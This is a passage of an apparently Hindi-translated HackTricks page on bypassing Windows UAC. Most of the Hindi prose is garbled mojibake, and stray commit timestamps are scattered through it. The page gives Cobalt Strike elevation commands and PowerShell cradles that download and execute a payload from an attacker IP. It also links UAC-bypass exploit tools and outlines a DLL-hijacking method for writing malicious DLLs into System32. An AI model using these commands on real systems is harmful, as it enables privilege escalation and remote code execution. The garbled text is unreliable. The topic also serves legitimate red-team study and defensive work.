рд╣реЛрдо рдлрд╝реЛрд▓реНрдбрд░)ред
2022-10-03 22:58:50 +00:00
{% hint style="warning" %}
**рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдпрд╣ рдЯреНрд░рд┐рдХ рдЕрдм рдХрд╛рдо рдирд╣реАрдВ рдХрд░ рд░рд╣реА рд╣реИ**
2022-10-03 22:58:50 +00:00
{% endhint %}
```bash
net use Z: \\127.0.0.1\c$
cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
### UAC рдмрд╛рдпрдкрд╛рд╕ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рдХреЗ рд╕рд╛рде
2022-10-03 22:58:50 +00:00
рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рддрдХрдиреАрдХреЗрдВ рдХреЗрд╡рд▓ рддрднреА рдХрд╛рдо рдХрд░реЗрдВрдЧреА рдЬрдм UAC рдХреЛ рдЗрд╕рдХреЗ рдЕрдзрд┐рдХрддрдо рд╕реБрд░рдХреНрд╖рд╛ рд╕реНрддрд░ рдкрд░ рд╕реЗрдЯ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реЛред
2022-08-13 15:36:34 +00:00
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
**Empire** рдФрд░ **Metasploit** рдореЗрдВ **UAC** рдХреЛ **bypass** рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдИ рдореЙрдбреНрдпреВрд▓ рд╣реИрдВред
2022-10-03 22:58:50 +00:00
### KRBUACBypass
рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдФрд░ рдЙрдкрдХрд░рдг [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass) рдореЗрдВ
### UAC bypass exploits
[**UACME** ](https://github.com/hfiref0x/UACME) рдЬреЛ рдХрдИ UAC bypass exploits рдХрд╛ **рд╕рдВрдХрд▓рди** рд╣реИред рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдЖрдкрдХреЛ **UACME рдХреЛ рд╡рд┐рдЬрд╝реБрдЕрд▓ рд╕реНрдЯреВрдбрд┐рдпреЛ рдпрд╛ msbuild рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдХрд▓рд┐рдд** рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред рд╕рдВрдХрд▓рди рдХрдИ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓реЗрдВ рдмрдирд╛рдПрдЧрд╛ (рдЬреИрд╕реЗ `Source\Akagi\outout\x64\Debug\Akagi.exe`), рдЖрдкрдХреЛ рдпрд╣ рдЬрд╛рдирдирд╛ рд╣реЛрдЧрд╛ рдХрд┐ **рдЖрдкрдХреЛ рдХреМрди рд╕реА рдЪрд╛рд╣рд┐рдПред**\
рдЖрдкрдХреЛ **рд╕рд╛рд╡рдзрд╛рди рд░рд╣рдирд╛ рдЪрд╛рд╣рд┐рдП** рдХреНрдпреЛрдВрдХрд┐ рдХреБрдЫ рдмрд╛рдпрдкрд╛рд╕ **рдХреБрдЫ рдЕрдиреНрдп рдХрд╛рд░реНрдпрдХреНрд░рдореЛрдВ рдХреЛ рдкреНрд░реЙрдореНрдкреНрдЯ** рдХрд░реЗрдВрдЧреЗ рдЬреЛ **рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛** рдХреЛ рд╕реВрдЪрд┐рдд рдХрд░реЗрдВрдЧреЗ рдХрд┐ рдХреБрдЫ рд╣реЛ рд░рд╣рд╛ рд╣реИред
2022-10-03 22:58:50 +00:00
UACME рдореЗрдВ **рдирд┐рд░реНрдорд╛рдг рд╕рдВрд╕реНрдХрд░рдг рд╣реИ рдЬрд┐рд╕рд╕реЗ рдкреНрд░рддреНрдпреЗрдХ рддрдХрдиреАрдХ рдХрд╛рдо рдХрд░рдирд╛ рд╢реБрд░реВ рд╣реБрдИ**ред рдЖрдк рдЕрдкрдиреЗ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рдиреЗ рд╡рд╛рд▓реА рддрдХрдиреАрдХ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
2022-10-03 22:58:50 +00:00
```
PS C:\> [environment]::OSVersion.Version
Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
```
Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) page you get the Windows release `1607` from the build versions.
#### More UAC bypass
**рд╕рднреА** рддрдХрдиреАрдХреЗрдВ рдЬреЛ рдпрд╣рд╛рдБ AUC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛рддреА рд╣реИрдВ **рдПрдХ рдкреВрд░реНрдг рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╢реЗрд▓** рдХреА **рдЖрд╡рд╢реНрдпрдХрддрд╛** рд╣реЛрддреА рд╣реИ (рдПрдХ рд╕рд╛рдорд╛рдиреНрдп nc.exe рд╢реЗрд▓ рдкрд░реНрдпрд╛рдкреНрдд рдирд╣реАрдВ рд╣реИ)ред
рдЖрдк **meterpreter** рд╕рддреНрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдПрдХ **рдкреНрд░рдХреНрд░рд┐рдпрд╛** рдореЗрдВ рдорд╛рдЗрдЧреНрд░реЗрдЯ рдХрд░реЗрдВ рдЬрд┐рд╕рдХрд╛ **рд╕рддреНрд░** рдорд╛рди **1** рдХреЗ рдмрд░рд╛рдмрд░ рд╣реИ:
2022-10-04 23:18:19 +00:00
![](<../../.gitbook/assets/image (96).png>)
(_explorer.exe_ рдХрд╛рдо рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдП)
### UAC Bypass with GUI
2022-12-29 12:57:18 +00:00
рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ **GUI** рддрдХ рдкрд╣реБрдБрдЪ рд╣реИ рддреЛ рдЖрдк рдЬрдм UAC рдкреНрд░реЙрдореНрдкреНрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВ рддреЛ рдмрд╕ рдЗрд╕реЗ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЖрдкрдХреЛ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдЗрд╕реЗ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред рдЗрд╕рд▓рд┐рдП, GUI рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ UAC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрдЧрд╛ред
2022-12-29 12:57:18 +00:00
рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдпрджрд┐ рдЖрдкрдХреЛ рдПрдХ GUI рд╕рддреНрд░ рдорд┐рд▓рддрд╛ рд╣реИ рдЬрд┐рд╕рдХрд╛ рдХреЛрдИ рдФрд░ рдЙрдкрдпреЛрдЧ рдХрд░ рд░рд╣рд╛ рдерд╛ (рд╕рдВрднрд╡рддрдГ RDP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ) рддреЛ рд╡рд╣рд╛рдБ **рдХреБрдЫ рдЙрдкрдХрд░рдг рд╣реЛрдВрдЧреЗ рдЬреЛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣реЗ рд╣реЛрдВрдЧреЗ** рдЬрд╣рд╛рдБ рд╕реЗ рдЖрдк **cmd** рдХреЛ рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП **рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ** рдХреЗ рд░реВрдк рдореЗрдВ рд╕реАрдзреЗ рдЪрд▓рд╛ рд╕рдХрддреЗ рд╣реИрдВ рдмрд┐рдирд╛ UAC рджреНрд╡рд╛рд░рд╛ рдлрд┐рд░ рд╕реЗ рдкреНрд░реЙрдореНрдкреНрдЯ рдХрд┐рдПред рдЬреИрд╕реЗ [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)ред рдпрд╣ рдереЛрдбрд╝рд╛ рдЕрдзрд┐рдХ **рдЧреБрдкреНрдд** рд╣реЛ рд╕рдХрддрд╛ рд╣реИред
2022-12-29 12:57:18 +00:00
### Noisy brute-force UAC bypass
2022-12-27 20:55:41 +00:00
рдпрджрд┐ рдЖрдкрдХреЛ рд╢реЛрд░ рдХрд░рдиреЗ рдХреА рдкрд░рд╡рд╛рд╣ рдирд╣реАрдВ рд╣реИ рддреЛ рдЖрдк рд╣рдореЗрд╢рд╛ **рдХреБрдЫ рдРрд╕рд╛ рдЪрд▓рд╛ рд╕рдХрддреЗ рд╣реИрдВ** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) рдЬреЛ **рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЛ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдкреВрдЫрддрд╛ рд╣реИ рдЬрдм рддрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЗрд╕реЗ рд╕реНрд╡реАрдХрд╛рд░ рдирд╣реАрдВ рдХрд░рддрд╛**ред
2022-12-27 20:55:41 +00:00
### Your own bypass - Basic UAC bypass methodology
рдпрджрд┐ рдЖрдк **UACME** рдкрд░ рдПрдХ рдирдЬрд╝рд░ рдбрд╛рд▓рддреЗ рд╣реИрдВ рддреЛ рдЖрдк рджреЗрдЦреЗрдВрдЧреЗ рдХрд┐ **рдЕрдзрд┐рдХрд╛рдВрд╢ UAC рдмрд╛рдпрдкрд╛рд╕ рдПрдХ Dll Hijacking рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ** (рдореБрдЦреНрдп рд░реВрдк рд╕реЗ _C:\Windows\System32_ рдкрд░ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг dll рд▓рд┐рдЦрдирд╛)ред [Dll Hijacking рдХрдордЬреЛрд░реА рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╕реЗ рдкрдврд╝реЗрдВ](../windows-local-privilege-escalation/dll-hijacking.md)ред
1. рдПрдХ рдмрд╛рдЗрдирд░реА рдЦреЛрдЬреЗрдВ рдЬреЛ **autoelevate** рдХрд░реЗрдЧрд╛ (рдЬрд╛рдБрдЪ рдХрд░реЗрдВ рдХрд┐ рдЬрдм рдЗрд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рддреЛ рдпрд╣ рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рдкрд░ рдЪрд▓рддрд╛ рд╣реИ)ред
2. procmon рдХреЗ рд╕рд╛рде "**NAME NOT FOUND**" рдШрдЯрдирд╛рдУрдВ рдХреЛ рдЦреЛрдЬреЗрдВ рдЬреЛ **DLL Hijacking** рдХреЗ рд▓рд┐рдП рдХрдордЬреЛрд░ рд╣реЛ рд╕рдХрддреА рд╣реИрдВред
3. рдЖрдкрдХреЛ рд╕рдВрднрд╡рддрдГ рдХреБрдЫ **рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрдереЛрдВ** (рдЬреИрд╕реЗ C:\Windows\System32) рдХреЗ рдЕрдВрджрд░ DLL **рд▓рд┐рдЦрдиреЗ** рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреА рдЬрд╣рд╛рдБ рдЖрдкрдХреЗ рдкрд╛рд╕ рд▓рд┐рдЦрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдирд╣реАрдВ рд╣реИред рдЖрдк рдЗрд╕реЗ рдмрд╛рдпрдкрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
1. **wusa.exe**: Windows 7, 8 рдФрд░ 8.1ред рдпрд╣ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрдереЛрдВ рдХреЗ рдЕрдВрджрд░ CAB рдлрд╝рд╛рдЗрд▓ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рдирд┐рдХрд╛рд▓рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ (рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рдЙрдкрдХрд░рдг рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддрд╛ рд╣реИ)ред
2. **IFileOperation**: Windows 10ред
4. рдПрдХ **рд╕реНрдХреНрд░рд┐рдкреНрдЯ** рддреИрдпрд╛рд░ рдХрд░реЗрдВ рдЬреЛ рдЖрдкрдХреЗ DLL рдХреЛ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрде рдХреЗ рдЕрдВрджрд░ рдХреЙрдкреА рдХрд░реЗ рдФрд░ рдХрдордЬреЛрд░ рдФрд░ рдСрдЯреЛрдПрд▓реАрд╡реЗрдЯреЗрдб рдмрд╛рдЗрдирд░реА рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗред
### Another UAC bypass technique
рдЗрд╕рдореЗрдВ рдпрд╣ рджреЗрдЦрдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рдПрдХ **autoElevated рдмрд╛рдЗрдирд░реА** **рдкрдВрдЬреАрдХрд░рдг** рд╕реЗ **рдмрд╛рдЗрдирд░реА** рдпрд╛ **рдХрдорд╛рдВрдб** рдХреЗ **рдирд╛рдо/рдкрде** рдХреЛ **рдкрдврд╝рдиреЗ** рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреА рд╣реИ рдЬрд┐рд╕реЗ **рдирд┐рд╖реНрдкрд╛рджрд┐рдд** рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рд╣реИ (рдпрд╣ рдЕрдзрд┐рдХ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ рдпрджрд┐ рдмрд╛рдЗрдирд░реА рдЗрд╕ рдЬрд╛рдирдХрд╛рд░реА рдХреЛ **HKCU** рдХреЗ рдЕрдВрджрд░ рдЦреЛрдЬрддреА рд╣реИ)ред
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** ЁЯТм [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ЁЯРж [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}